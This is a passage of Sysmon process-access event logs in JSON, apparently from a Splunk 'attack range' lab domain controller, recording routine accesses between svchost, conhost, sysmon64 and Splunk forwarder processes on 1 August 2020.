{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6401,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6402,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6403,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6404,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6405,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6406,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.808\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-123B-5F25-0000-0010D13A0900}\r\nTargetProcessId: 668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.808","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-123B-5F25-0000-0010D13A0900}","TargetProcessId":"668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:56:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6407,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:56:59.933\r\nSourceProcessGUID: {E2A3D6B1-123B-5F25-0000-0010D13A0900}\r\nSourceProcessId: 668\r\nSourceThreadId: 3100\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:56:59.933","SourceProcessGUID":"{E2A3D6B1-123B-5F25-0000-0010D13A0900}","SourceProcessId":"668","SourceThreadId":"3100","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nTargetProcessId: 596\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","TargetProcessId":"596","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-00100FBA0000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:00.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-00100FBA0000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:00.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 